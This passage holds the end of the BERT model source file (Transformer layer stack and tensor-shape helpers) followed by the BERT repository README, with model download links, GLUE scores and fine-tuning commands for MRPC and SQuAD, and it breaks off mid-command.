https://arxiv.org/abs/1706.03762 Also see: https://github.com/tensorflow/tensor2tensor/blob/master/tensor2tensor/models/transformer.py Args: input_tensor: float Tensor of shape [batch_size, seq_length, hidden_size]. attention_mask: (optional) int32 Tensor of shape [batch_size, seq_length, seq_length], with 1 for positions that can be attended to and 0 in positions that should not be. hidden_size: int. Hidden size of the Transformer. num_hidden_layers: int. Number of layers (blocks) in the Transformer. num_attention_heads: int. Number of attention heads in the Transformer. intermediate_size: int. The size of the "intermediate" (a.k.a., feed forward) layer. intermediate_act_fn: function. The non-linear activation function to apply to the output of the intermediate/feed-forward layer. hidden_dropout_prob: float. Dropout probability for the hidden layers. attention_probs_dropout_prob: float. Dropout probability of the attention probabilities. initializer_range: float. Range of the initializer (stddev of truncated normal). do_return_all_layers: Whether to also return all layers or just the final layer. Returns: float Tensor of shape [batch_size, seq_length, hidden_size], the final hidden layer of the Transformer. Raises: ValueError: A Tensor shape or parameter is invalid. """ if hidden_size % num_attention_heads != 0: raise ValueError( "The hidden size (%d) is not a multiple of the number of attention " "heads (%d)" % (hidden_size, num_attention_heads)) attention_head_size = int(hidden_size / num_attention_heads) input_shape = get_shape_list(input_tensor, expected_rank=3) batch_size = input_shape[0] seq_length = input_shape[1] input_width = input_shape[2] # The Transformer performs sum residuals on all layers so the input needs # to be the same as the hidden size. if input_width != hidden_size: raise ValueError("The width of the input tensor (%d) != hidden size (%d)" % (input_width, hidden_size)) # We keep the representation as a 2D tensor to avoid re-shaping it back and # forth from a 3D tensor to a 2D tensor. Re-shapes are normally free on # the GPU/CPU but may not be free on the TPU, so we want to minimize them to # help the optimizer. prev_output = reshape_to_matrix(input_tensor) all_layer_outputs = [] for layer_idx in range(num_hidden_layers): with tf.variable_scope("layer_%d" % layer_idx): layer_input = prev_output with tf.variable_scope("attention"): attention_heads = [] with tf.variable_scope("self"): attention_head = attention_layer( from_tensor=layer_input, to_tensor=layer_input, attention_mask=attention_mask, num_attention_heads=num_attention_heads, size_per_head=attention_head_size, attention_probs_dropout_prob=attention_probs_dropout_prob, initializer_range=initializer_range, do_return_2d_tensor=True, batch_size=batch_size, from_seq_length=seq_length, to_seq_length=seq_length) attention_heads.append(attention_head) attention_output = None if len(attention_heads) == 1: attention_output = attention_heads[0] else: # In the case where we have other sequences, we just concatenate # them to the self-attention head before the projection. attention_output = tf.concat(attention_heads, axis=-1) # Run a linear projection of `hidden_size` then add a residual # with `layer_input`. with tf.variable_scope("output"): attention_output = tf.layers.dense( attention_output, hidden_size, kernel_initializer=create_initializer(initializer_range)) attention_output = dropout(attention_output, hidden_dropout_prob) attention_output = layer_norm(attention_output + layer_input) # The activation is only applied to the "intermediate" hidden layer. with tf.variable_scope("intermediate"): intermediate_output = tf.layers.dense( attention_output, intermediate_size, activation=intermediate_act_fn, kernel_initializer=create_initializer(initializer_range)) # Down-project back to `hidden_size` then add the residual. with tf.variable_scope("output"): layer_output = tf.layers.dense( intermediate_output, hidden_size, kernel_initializer=create_initializer(initializer_range)) layer_output = dropout(layer_output, hidden_dropout_prob) layer_output = layer_norm(layer_output + attention_output) prev_output = layer_output all_layer_outputs.append(layer_output) if do_return_all_layers: final_outputs = [] for layer_output in all_layer_outputs: final_output = reshape_from_matrix(layer_output, input_shape) final_outputs.append(final_output) return final_outputs else: final_output = reshape_from_matrix(prev_output, input_shape) return final_output def get_shape_list(tensor, expected_rank=None, name=None): """Returns a list of the shape of tensor, preferring static dimensions. Args: tensor: A tf.Tensor object to find the shape of. expected_rank: (optional) int. The expected rank of `tensor`. If this is specified and the `tensor` has a different rank, and exception will be thrown. name: Optional name of the tensor for the error message. Returns: A list of dimensions of the shape of tensor. All static dimensions will be returned as python integers, and dynamic dimensions will be returned as tf.Tensor scalars. """ if name is None: name = tensor.name if expected_rank is not None: assert_rank(tensor, expected_rank, name) shape = tensor.shape.as_list() non_static_indexes = [] for (index, dim) in enumerate(shape): if dim is None: non_static_indexes.append(index) if not non_static_indexes: return shape dyn_shape = tf.shape(tensor) for index in non_static_indexes: shape[index] = dyn_shape[index] return shape def reshape_to_matrix(input_tensor): """Reshapes a >= rank 2 tensor to a rank 2 tensor (i.e., a matrix).""" ndims = input_tensor.shape.ndims if ndims < 2: raise ValueError("Input tensor must have at least rank 2. Shape = %s" % (input_tensor.shape)) if ndims == 2: return input_tensor width = input_tensor.shape[-1] output_tensor = tf.reshape(input_tensor, [-1, width]) return output_tensor def reshape_from_matrix(output_tensor, orig_shape_list): """Reshapes a rank 2 tensor back to its original rank >= 2 tensor.""" if len(orig_shape_list) == 2: return output_tensor output_shape = get_shape_list(output_tensor) orig_dims = orig_shape_list[0:-1] width = output_shape[-1] return tf.reshape(output_tensor, orig_dims + [width]) def assert_rank(tensor, expected_rank, name=None): """Raises an exception if the tensor rank is not of the expected rank. Args: tensor: A tf.Tensor to check the rank of. expected_rank: Python integer or list of integers, expected rank. name: Optional name of the tensor for the error message. Raises: ValueError: If the expected shape doesn't match the actual shape. """ if name is None: name = tensor.name expected_rank_dict = {} if isinstance(expected_rank, six.integer_types): expected_rank_dict[expected_rank] = True else: for x in expected_rank: expected_rank_dict[x] = True actual_rank = tensor.shape.ndims if actual_rank not in expected_rank_dict: scope_name = tf.get_variable_scope().name raise ValueError( "For the tensor `%s` in scope `%s`, the actual rank " "`%d` (shape = %s) is not equal to the expected rank `%s`" % (name, scope_name, actual_rank, str(tensor.shape), str(expected_rank)))
# BERT **\*\*\*\*\* New March 11th, 2020: Smaller BERT Models \*\*\*\*\*** This is a release of 24 smaller BERT models (English only, uncased, trained with WordPiece masking) referenced in [Well-Read Students Learn Better: On the Importance of Pre-training Compact Models](https://arxiv.org/abs/1908.08962). We have shown that the standard BERT recipe (including model architecture and training objective) is effective on a wide range of model sizes, beyond BERT-Base and BERT-Large. The smaller BERT models are intended for environments with restricted computational resources. They can be fine-tuned in the same manner as the original BERT models. However, they are most effective in the context of knowledge distillation, where the fine-tuning labels are produced by a larger and more accurate teacher. Our goal is to enable research in institutions with fewer computational resources and encourage the community to seek directions of innovation alternative to increasing model capacity. You can download all 24 from [here][all], or individually from the table below: | |H=128|H=256|H=512|H=768| |---|:---:|:---:|:---:|:---:| | **L=2** |[**2/128 (BERT-Tiny)**][2_128]|[2/256][2_256]|[2/512][2_512]|[2/768][2_768]| | **L=4** |[4/128][4_128]|[**4/256 (BERT-Mini)**][4_256]|[**4/512 (BERT-Small)**][4_512]|[4/768][4_768]| | **L=6** |[6/128][6_128]|[6/256][6_256]|[6/512][6_512]|[6/768][6_768]| | **L=8** |[8/128][8_128]|[8/256][8_256]|[**8/512 (BERT-Medium)**][8_512]|[8/768][8_768]| | **L=10** |[10/128][10_128]|[10/256][10_256]|[10/512][10_512]|[10/768][10_768]| | **L=12** |[12/128][12_128]|[12/256][12_256]|[12/512][12_512]|[**12/768 (BERT-Base)**][12_768]| Note that the BERT-Base model in this release is included for completeness only; it was re-trained under the same regime as the original model. Here are the corresponding GLUE scores on the test set: |Model|Score|CoLA|SST-2|MRPC|STS-B|QQP|MNLI-m|MNLI-mm|QNLI(v2)|RTE|WNLI|AX| |---|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:|:---:| |BERT-Tiny|64.2|0.0|83.2|81.1/71.1|74.3/73.6|62.2/83.4|70.2|70.3|81.5|57.2|62.3|21.0| |BERT-Mini|65.8|0.0|85.9|81.1/71.8|75.4/73.3|66.4/86.2|74.8|74.3|84.1|57.9|62.3|26.1| |BERT-Small|71.2|27.8|89.7|83.4/76.2|78.8/77.0|68.1/87.0|77.6|77.0|86.4|61.8|62.3|28.6| |BERT-Medium|73.5|38.0|89.6|86.6/81.6|80.4/78.4|69.6/87.9|80.0|79.1|87.7|62.2|62.3|30.5| For each task, we selected the best fine-tuning hyperparameters from the lists below, and trained for 4 epochs: - batch sizes: 8, 16, 32, 64, 128 - learning rates: 3e-4, 1e-4, 5e-5, 3e-5 If you use these models, please cite the following paper: ``` @article{turc2019, title={Well-Read Students Learn Better: On the Importance of Pre-training Compact Models}, author={Turc, Iulia and Chang, Ming-Wei and Lee, Kenton and Toutanova, Kristina}, journal={arXiv preprint arXiv:1908.08962v2 }, year={2019} } ``` [2_128]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-2_H-128_A-2.zip [2_256]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-2_H-256_A-4.zip [2_512]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-2_H-512_A-8.zip [2_768]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-2_H-768_A-12.zip [4_128]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-4_H-128_A-2.zip [4_256]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-4_H-256_A-4.zip [4_512]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-4_H-512_A-8.zip [4_768]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-4_H-768_A-12.zip [6_128]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-6_H-128_A-2.zip [6_256]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-6_H-256_A-4.zip [6_512]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-6_H-512_A-8.zip [6_768]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-6_H-768_A-12.zip [8_128]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-8_H-128_A-2.zip [8_256]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-8_H-256_A-4.zip [8_512]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-8_H-512_A-8.zip [8_768]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-8_H-768_A-12.zip [10_128]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-10_H-128_A-2.zip [10_256]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-10_H-256_A-4.zip [10_512]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-10_H-512_A-8.zip [10_768]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-10_H-768_A-12.zip [12_128]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-12_H-128_A-2.zip [12_256]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-12_H-256_A-4.zip [12_512]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-12_H-512_A-8.zip [12_768]: https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-12_H-768_A-12.zip [all]: https://storage.googleapis.com/bert_models/2020_02_20/all_bert_models.zip **\*\*\*\*\* New May 31st, 2019: Whole Word Masking Models \*\*\*\*\*** This is a release of several new models which were the result of an improvement the pre-processing code. In the original pre-processing code, we randomly select WordPiece tokens to mask. For example: `Input Text: the man jumped up , put his basket on phil ##am ##mon ' s head` `Original Masked Input: [MASK] man [MASK] up , put his [MASK] on phil [MASK] ##mon ' s head` The new technique is called Whole Word Masking. In this case, we always mask *all* of the the tokens corresponding to a word at once. The overall masking rate remains the same. `Whole Word Masked Input: the man [MASK] up , put his basket on [MASK] [MASK] [MASK] ' s head` The training is identical -- we still predict each masked WordPiece token independently. The improvement comes from the fact that the original prediction task was too 'easy' for words that had been split into multiple WordPieces. This can be enabled during data generation by passing the flag `--do_whole_word_mask=True` to `create_pretraining_data.py`. Pre-trained models with Whole Word Masking are linked below. The data and training were otherwise identical, and the models have identical structure and vocab to the original models. We only include BERT-Large models. When using these models, please make it clear in the paper that you are using the Whole Word Masking variant of BERT-Large. * **[`BERT-Large, Uncased (Whole Word Masking)`](https://storage.googleapis.com/bert_models/2019_05_30/wwm_uncased_L-24_H-1024_A-16.zip)**: 24-layer, 1024-hidden, 16-heads, 340M parameters * **[`BERT-Large, Cased (Whole Word Masking)`](https://storage.googleapis.com/bert_models/2019_05_30/wwm_cased_L-24_H-1024_A-16.zip)**: 24-layer, 1024-hidden, 16-heads, 340M parameters Model | SQUAD 1.1 F1/EM | Multi NLI Accuracy ---------------------------------------- | :-------------: | :----------------: BERT-Large, Uncased (Original) | 91.0/84.3 | 86.05 BERT-Large, Uncased (Whole Word Masking) | 92.8/86.7 | 87.07 BERT-Large, Cased (Original) | 91.5/84.8 | 86.09 BERT-Large, Cased (Whole Word Masking) | 92.9/86.7 | 86.46 **\*\*\*\*\* New February 7th, 2019: TfHub Module \*\*\*\*\*** BERT has been uploaded to [TensorFlow Hub](https://tfhub.dev). See `run_classifier_with_tfhub.py` for an example of how to use the TF Hub module, or run an example in the browser on [Colab](https://colab.sandbox.google.com/github/google-research/bert/blob/master/predicting_movie_reviews_with_bert_on_tf_hub.ipynb). **\*\*\*\*\* New November 23rd, 2018: Un-normalized multilingual model + Thai + Mongolian \*\*\*\*\*** We uploaded a new multilingual model which does *not* perform any normalization on the input (no lower casing, accent stripping, or Unicode normalization), and additionally inclues Thai and Mongolian. **It is recommended to use this version for developing multilingual models, especially on languages with non-Latin alphabets.** This does not require any code changes, and can be downloaded here: * **[`BERT-Base, Multilingual Cased`](https://storage.googleapis.com/bert_models/2018_11_23/multi_cased_L-12_H-768_A-12.zip)**: 104 languages, 12-layer, 768-hidden, 12-heads, 110M parameters **\*\*\*\*\* New November 15th, 2018: SOTA SQuAD 2.0 System \*\*\*\*\*** We released code changes to reproduce our 83% F1 SQuAD 2.0 system, which is currently 1st place on the leaderboard by 3%. See the SQuAD 2.0 section of the README for details. **\*\*\*\*\* New November 5th, 2018: Third-party PyTorch and Chainer versions of BERT available \*\*\*\*\*** NLP researchers from HuggingFace made a [PyTorch version of BERT available](https://github.com/huggingface/pytorch-pretrained-BERT) which is compatible with our pre-trained checkpoints and is able to reproduce our results. Sosuke Kobayashi also made a [Chainer version of BERT available](https://github.com/soskek/bert-chainer) (Thanks!) We were not involved in the creation or maintenance of the PyTorch implementation so please direct any questions towards the authors of that repository. **\*\*\*\*\* New November 3rd, 2018: Multilingual and Chinese models available \*\*\*\*\*** We have made two new BERT models available: * **[`BERT-Base, Multilingual`](https://storage.googleapis.com/bert_models/2018_11_03/multilingual_L-12_H-768_A-12.zip) (Not recommended, use `Multilingual Cased` instead)**: 102 languages, 12-layer, 768-hidden, 12-heads, 110M parameters * **[`BERT-Base, Chinese`](https://storage.googleapis.com/bert_models/2018_11_03/chinese_L-12_H-768_A-12.zip)**: Chinese Simplified and Traditional, 12-layer, 768-hidden, 12-heads, 110M parameters We use character-based tokenization for Chinese, and WordPiece tokenization for all other languages. Both models should work out-of-the-box without any code changes. We did update the implementation of `BasicTokenizer` in `tokenization.py` to support Chinese character tokenization, so please update if you forked it. However, we did not change the tokenization API. For more, see the [Multilingual README](https://github.com/google-research/bert/blob/master/multilingual.md). **\*\*\*\*\* End new information \*\*\*\*\*** ## Introduction **BERT**, or **B**idirectional **E**ncoder **R**epresentations from **T**ransformers, is a new method of pre-training language representations which obtains state-of-the-art results on a wide array of Natural Language Processing (NLP) tasks. Our academic paper which describes BERT in detail and provides full results on a number of tasks can be found here: [https://arxiv.org/abs/1810.04805](https://arxiv.org/abs/1810.04805). To give a few numbers, here are the results on the [SQuAD v1.1](https://rajpurkar.github.io/SQuAD-explorer/) question answering task: SQuAD v1.1 Leaderboard (Oct 8th 2018) | Test EM | Test F1 ------------------------------------- | :------: | :------: 1st Place Ensemble - BERT | **87.4** | **93.2** 2nd Place Ensemble - nlnet | 86.0 | 91.7 1st Place Single Model - BERT | **85.1** | **91.8** 2nd Place Single Model - nlnet | 83.5 | 90.1 And several natural language inference tasks: System | MultiNLI | Question NLI | SWAG ----------------------- | :------: | :----------: | :------: BERT | **86.7** | **91.1** | **86.3** OpenAI GPT (Prev. SOTA) | 82.2 | 88.1 | 75.0 Plus many other tasks. Moreover, these results were all obtained with almost no task-specific neural network architecture design. If you already know what BERT is and you just want to get started, you can [download the pre-trained models](#pre-trained-models) and [run a state-of-the-art fine-tuning](#fine-tuning-with-bert) in only a few minutes. ## What is BERT? BERT is a method of pre-training language representations, meaning that we train a general-purpose "language understanding" model on a large text corpus (like Wikipedia), and then use that model for downstream NLP tasks that we care about (like question answering). BERT outperforms previous methods because it is the first *unsupervised*, *deeply bidirectional* system for pre-training NLP. *Unsupervised* means that BERT was trained using only a plain text corpus, which is important because an enormous amount of plain text data is publicly available on the web in many languages. Pre-trained representations can also either be *context-free* or *contextual*, and contextual representations can further be *unidirectional* or *bidirectional*. Context-free models such as [word2vec](https://www.tensorflow.org/tutorials/representation/word2vec) or [GloVe](https://nlp.stanford.edu/projects/glove/) generate a single "word embedding" representation for each word in the vocabulary, so `bank` would have the same representation in `bank deposit` and `river bank`. Contextual models instead generate a representation of each word that is based on the other words in the sentence. BERT was built upon recent work in pre-training contextual representations — including [Semi-supervised Sequence Learning](https://arxiv.org/abs/1511.01432), [Generative Pre-Training](https://blog.openai.com/language-unsupervised/), [ELMo](https://allennlp.org/elmo), and [ULMFit](http://nlp.fast.ai/classification/2018/05/15/introducting-ulmfit.html) — but crucially these models are all *unidirectional* or *shallowly bidirectional*. This means that each word is only contextualized using the words to its left (or right). For example, in the sentence `I made a bank deposit` the unidirectional representation of `bank` is only based on `I made a` but not `deposit`. Some previous work does combine the representations from separate left-context and right-context models, but only in a "shallow" manner. BERT represents "bank" using both its left and right context — `I made a ... deposit` — starting from the very bottom of a deep neural network, so it is *deeply bidirectional*. BERT uses a simple approach for this: We mask out 15% of the words in the input, run the entire sequence through a deep bidirectional [Transformer](https://arxiv.org/abs/1706.03762) encoder, and then predict only the masked words. For example: ``` Input: the man went to the [MASK1] . he bought a [MASK2] of milk. Labels: [MASK1] = store; [MASK2] = gallon ``` In order to learn relationships between sentences, we also train on a simple task which can be generated from any monolingual corpus: Given two sentences `A` and `B`, is `B` the actual next sentence that comes after `A`, or just a random sentence from the corpus? ``` Sentence A: the man went to the store . Sentence B: he bought a gallon of milk . Label: IsNextSentence ``` ``` Sentence A: the man went to the store . Sentence B: penguins are flightless . Label: NotNextSentence ``` We then train a large model (12-layer to 24-layer Transformer) on a large corpus (Wikipedia + [BookCorpus](http://yknzhu.wixsite.com/mbweb)) for a long time (1M update steps), and that's BERT. Using BERT has two stages: *Pre-training* and *fine-tuning*. **Pre-training** is fairly expensive (four days on 4 to 16 Cloud TPUs), but is a one-time procedure for each language (current models are English-only, but multilingual models will be released in the near future). We are releasing a number of pre-trained models from the paper which were pre-trained at Google. Most NLP researchers will never need to pre-train their own model from scratch. **Fine-tuning** is inexpensive. All of the results in the paper can be replicated in at most 1 hour on a single Cloud TPU, or a few hours on a GPU, starting from the exact same pre-trained model. SQuAD, for example, can be trained in around 30 minutes on a single Cloud TPU to achieve a Dev F1 score of 91.0%, which is the single system state-of-the-art. The other important aspect of BERT is that it can be adapted to many types of NLP tasks very easily. In the paper, we demonstrate state-of-the-art results on sentence-level (e.g., SST-2), sentence-pair-level (e.g., MultiNLI), word-level (e.g., NER), and span-level (e.g., SQuAD) tasks with almost no task-specific modifications. ## What has been released in this repository? We are releasing the following: * TensorFlow code for the BERT model architecture (which is mostly a standard [Transformer](https://arxiv.org/abs/1706.03762) architecture). * Pre-trained checkpoints for both the lowercase and cased version of `BERT-Base` and `BERT-Large` from the paper. * TensorFlow code for push-button replication of the most important fine-tuning experiments from the paper, including SQuAD, MultiNLI, and MRPC. All of the code in this repository works out-of-the-box with CPU, GPU, and Cloud TPU. ## Pre-trained models We are releasing the `BERT-Base` and `BERT-Large` models from the paper. `Uncased` means that the text has been lowercased before WordPiece tokenization, e.g., `John Smith` becomes `john smith`. The `Uncased` model also strips out any accent markers. `Cased` means that the true case and accent markers are preserved. Typically, the `Uncased` model is better unless you know that case information is important for your task (e.g., Named Entity Recognition or Part-of-Speech tagging). These models are all released under the same license as the source code (Apache 2.0). For information about the Multilingual and Chinese model, see the [Multilingual README](https://github.com/google-research/bert/blob/master/multilingual.md). **When using a cased model, make sure to pass `--do_lower=False` to the training scripts. (Or pass `do_lower_case=False` directly to `FullTokenizer` if you're using your own script.)** The links to the models are here (right-click, 'Save link as...' on the name): * **[`BERT-Large, Uncased (Whole Word Masking)`](https://storage.googleapis.com/bert_models/2019_05_30/wwm_uncased_L-24_H-1024_A-16.zip)**: 24-layer, 1024-hidden, 16-heads, 340M parameters * **[`BERT-Large, Cased (Whole Word Masking)`](https://storage.googleapis.com/bert_models/2019_05_30/wwm_cased_L-24_H-1024_A-16.zip)**: 24-layer, 1024-hidden, 16-heads, 340M parameters * **[`BERT-Base, Uncased`](https://storage.googleapis.com/bert_models/2018_10_18/uncased_L-12_H-768_A-12.zip)**: 12-layer, 768-hidden, 12-heads, 110M parameters * **[`BERT-Large, Uncased`](https://storage.googleapis.com/bert_models/2018_10_18/uncased_L-24_H-1024_A-16.zip)**: 24-layer, 1024-hidden, 16-heads, 340M parameters * **[`BERT-Base, Cased`](https://storage.googleapis.com/bert_models/2018_10_18/cased_L-12_H-768_A-12.zip)**: 12-layer, 768-hidden, 12-heads , 110M parameters * **[`BERT-Large, Cased`](https://storage.googleapis.com/bert_models/2018_10_18/cased_L-24_H-1024_A-16.zip)**: 24-layer, 1024-hidden, 16-heads, 340M parameters * **[`BERT-Base, Multilingual Cased (New, recommended)`](https://storage.googleapis.com/bert_models/2018_11_23/multi_cased_L-12_H-768_A-12.zip)**: 104 languages, 12-layer, 768-hidden, 12-heads, 110M parameters * **[`BERT-Base, Multilingual Uncased (Orig, not recommended)`](https://storage.googleapis.com/bert_models/2018_11_03/multilingual_L-12_H-768_A-12.zip) (Not recommended, use `Multilingual Cased` instead)**: 102 languages, 12-layer, 768-hidden, 12-heads, 110M parameters * **[`BERT-Base, Chinese`](https://storage.googleapis.com/bert_models/2018_11_03/chinese_L-12_H-768_A-12.zip)**: Chinese Simplified and Traditional, 12-layer, 768-hidden, 12-heads, 110M parameters Each .zip file contains three items: * A TensorFlow checkpoint (`bert_model.ckpt`) containing the pre-trained weights (which is actually 3 files). * A vocab file (`vocab.txt`) to map WordPiece to word id. * A config file (`bert_config.json`) which specifies the hyperparameters of the model. ## Fine-tuning with BERT **Important**: All results on the paper were fine-tuned on a single Cloud TPU, which has 64GB of RAM. It is currently not possible to re-produce most of the `BERT-Large` results on the paper using a GPU with 12GB - 16GB of RAM, because the maximum batch size that can fit in memory is too small. We are working on adding code to this repository which allows for much larger effective batch size on the GPU. See the section on [out-of-memory issues](#out-of-memory-issues) for more details. This code was tested with TensorFlow 1.11.0. It was tested with Python2 and Python3 (but more thoroughly with Python2, since this is what's used internally in Google). The fine-tuning examples which use `BERT-Base` should be able to run on a GPU that has at least 12GB of RAM using the hyperparameters given. ### Fine-tuning with Cloud TPUs Most of the examples below assumes that you will be running training/evaluation on your local machine, using a GPU like a Titan X or GTX 1080. However, if you have access to a Cloud TPU that you want to train on, just add the following flags to `run_classifier.py` or `run_squad.py`: ``` --use_tpu=True \ --tpu_name=$TPU_NAME ``` Please see the [Google Cloud TPU tutorial](https://cloud.google.com/tpu/docs/tutorials/mnist) for how to use Cloud TPUs. Alternatively, you can use the Google Colab notebook "[BERT FineTuning with Cloud TPUs](https://colab.research.google.com/github/tensorflow/tpu/blob/master/tools/colab/bert_finetuning_with_cloud_tpus.ipynb)". On Cloud TPUs, the pretrained model and the output directory will need to be on Google Cloud Storage. For example, if you have a bucket named `some_bucket`, you might use the following flags instead: ``` --output_dir=gs://some_bucket/my_output_dir/ ``` The unzipped pre-trained model files can also be found in the Google Cloud Storage folder `gs://bert_models/2018_10_18`. For example: ``` export BERT_BASE_DIR=gs://bert_models/2018_10_18/uncased_L-12_H-768_A-12 ``` ### Sentence (and sentence-pair) classification tasks Before running this example you must download the [GLUE data](https://gluebenchmark.com/tasks) by running [this script](https://gist.github.com/W4ngatang/60c2bdb54d156a41194446737ce03e2e) and unpack it to some directory `$GLUE_DIR`. Next, download the `BERT-Base` checkpoint and unzip it to some directory `$BERT_BASE_DIR`. This example code fine-tunes `BERT-Base` on the Microsoft Research Paraphrase Corpus (MRPC) corpus, which only contains 3,600 examples and can fine-tune in a few minutes on most GPUs. ```shell export BERT_BASE_DIR=/path/to/bert/uncased_L-12_H-768_A-12 export GLUE_DIR=/path/to/glue python run_classifier.py \ --task_name=MRPC \ --do_train=true \ --do_eval=true \ --data_dir=$GLUE_DIR/MRPC \ --vocab_file=$BERT_BASE_DIR/vocab.txt \ --bert_config_file=$BERT_BASE_DIR/bert_config.json \ --init_checkpoint=$BERT_BASE_DIR/bert_model.ckpt \ --max_seq_length=128 \ --train_batch_size=32 \ --learning_rate=2e-5 \ --num_train_epochs=3.0 \ --output_dir=/tmp/mrpc_output/ ``` You should see output like this: ``` ***** Eval results ***** eval_accuracy = 0.845588 eval_loss = 0.505248 global_step = 343 loss = 0.505248 ``` This means that the Dev set accuracy was 84.55%. Small sets like MRPC have a high variance in the Dev set accuracy, even when starting from the same pre-training checkpoint. If you re-run multiple times (making sure to point to different `output_dir`), you should see results between 84% and 88%. A few other pre-trained models are implemented off-the-shelf in `run_classifier.py`, so it should be straightforward to follow those examples to use BERT for any single-sentence or sentence-pair classification task. Note: You might see a message `Running train on CPU`. This really just means that it's running on something other than a Cloud TPU, which includes a GPU. #### Prediction from classifier Once you have trained your classifier you can use it in inference mode by using the --do_predict=true command. You need to have a file named test.tsv in the input folder. Output will be created in file called test_results.tsv in the output folder. Each line will contain output for each sample, columns are the class probabilities. ```shell export BERT_BASE_DIR=/path/to/bert/uncased_L-12_H-768_A-12 export GLUE_DIR=/path/to/glue export TRAINED_CLASSIFIER=/path/to/fine/tuned/classifier python run_classifier.py \ --task_name=MRPC \ --do_predict=true \ --data_dir=$GLUE_DIR/MRPC \ --vocab_file=$BERT_BASE_DIR/vocab.txt \ --bert_config_file=$BERT_BASE_DIR/bert_config.json \ --init_checkpoint=$TRAINED_CLASSIFIER \ --max_seq_length=128 \ --output_dir=/tmp/mrpc_output/ ``` ### SQuAD 1.1 The Stanford Question Answering Dataset (SQuAD) is a popular question answering benchmark dataset. BERT (at the time of the release) obtains state-of-the-art results on SQuAD with almost no task-specific network architecture modifications or data augmentation. However, it does require semi-complex data pre-processing and post-processing to deal with (a) the variable-length nature of SQuAD context paragraphs, and (b) the character-level answer annotations which are used for SQuAD training. This processing is implemented and documented in `run_squad.py`. To run on SQuAD, you will first need to download the dataset. The [SQuAD website](https://rajpurkar.github.io/SQuAD-explorer/) does not seem to link to the v1.1 datasets any longer, but the necessary files can be found here: * [train-v1.1.json](https://rajpurkar.github.io/SQuAD-explorer/dataset/train-v1.1.json) * [dev-v1.1.json](https://rajpurkar.github.io/SQuAD-explorer/dataset/dev-v1.1.json) * [evaluate-v1.1.py](https://github.com/allenai/bi-att-flow/blob/master/squad/evaluate-v1.1.py) Download these to some directory `$SQUAD_DIR`. The state-of-the-art SQuAD results from the paper currently cannot be reproduced on a 12GB-16GB GPU due to memory constraints (in fact, even batch size 1 does not seem to fit on a 12GB GPU using `BERT-Large`). However, a reasonably strong `BERT-Base` model can be trained on the GPU with these hyperparameters: ```shell python run_squad.py \ --vocab_file=$BERT_BASE_DIR/vocab.txt \ --bert_config_file=$BERT_BASE_DIR/bert_config.json \ --init_checkpoint=$BERT_BASE_DIR/bert_model.ckpt \ --do_train=True \ --train_file=$SQUAD_DIR/train-v1.1.json \ --do_predict=True \ --predict_file=$SQUAD_DIR/dev-v1.1.json \ --train_batch_size=12 \ --learning_rate=3e-5 \ --num_train_epochs=2.0 \ --max_seq_length=384 \ --doc_stride=128 \ --output_dir=/tmp/squad_base/ ``` The dev set predictions will be saved into a file called `predictions.json` in the `output_dir`: ```shell python $SQUAD_DIR/evaluate-v1.1.py $SQUAD_DIR/dev-v1.1.json ./squad/predictions.json ``` Which should produce an output like this: ```shell {"f1": 88.41249612335034, "exact_match": 81.2488174077578} ``` You should see a result similar to the 88.5% reported in the paper for `BERT-Base`. If you have access to a Cloud TPU, you can train with `BERT-Large`. Here is a set of hyperparameters (slightly different than the paper) which consistently obtain around 90.5%-91.0% F1 single-system trained only on SQuAD: ```shell python run_squad.py \ --vocab_file=$BERT_LARGE_DIR/vocab.txt \ --bert_config_file=$BERT_LARGE_DIR/bert_config.json \ --init_checkpoint=$BERT_LARGE_DIR/bert_model.ckpt \ --do_train=True \ --train_file=$SQUAD_DIR/train-v1.1.json \ --do_predict=True \ --predict_file=$SQUAD_DIR/dev-v1.1.json \ --train_batch_size=24 \ --learning_rate=3e-5 \ --num_train_epochs=2.0 \ --max_seq_length=384 \ --doc_stride=128 \ --output_dir=gs://some_bucket/squad_large/ \ --use_tpu=True \ --tpu_name=$TPU_NAME ``` For example, one random run with these parameters produces the following Dev scores: ```shell {"f1": 90.87081895814865, "exact_match": 84.38978240302744} ``` If you fine-tune for one epoch on [TriviaQA](http://nlp.cs.washington.edu/triviaqa/) before this the results will be even better, but you will need to convert TriviaQA into the SQuAD json format. ### SQuAD 2.0 This model is also implemented and documented in `run_squad.py`. To run on SQuAD 2.0, you will first need to download the dataset. The necessary files can be found here: * [train-v2.0.json](https://rajpurkar.github.io/SQuAD-explorer/dataset/train-v2.0.json) * [dev-v2.0.json](https://rajpurkar.github.io/SQuAD-explorer/dataset/dev-v2.0.json) * [evaluate-v2.0.py](https://worksheets.codalab.org/rest/bundles/0x6b567e1cf2e041ec80d7098f031c5c9e/contents/blob/) Download these to some directory `$SQUAD_DIR`. On Cloud TPU you can run with BERT-Large as follows: ```shell python run_squad.py \ --vocab_file=$BERT_LARGE_DIR/vocab.txt \ --bert_config_file=$BERT_LARGE_DIR/bert_config.json \ --init_checkpoint=$BERT_LARGE_DIR/bert_model.ckpt \ --do_train=True \ --train_file=$SQUAD_DIR/train-v2.0.json \ --do_predict=True \ --predict_file=$SQUAD_DIR/dev-v2.0.json \ --train_batch_size=24 \ --learning_rate=3e-5 \ --num_train_epochs=2.0 \ 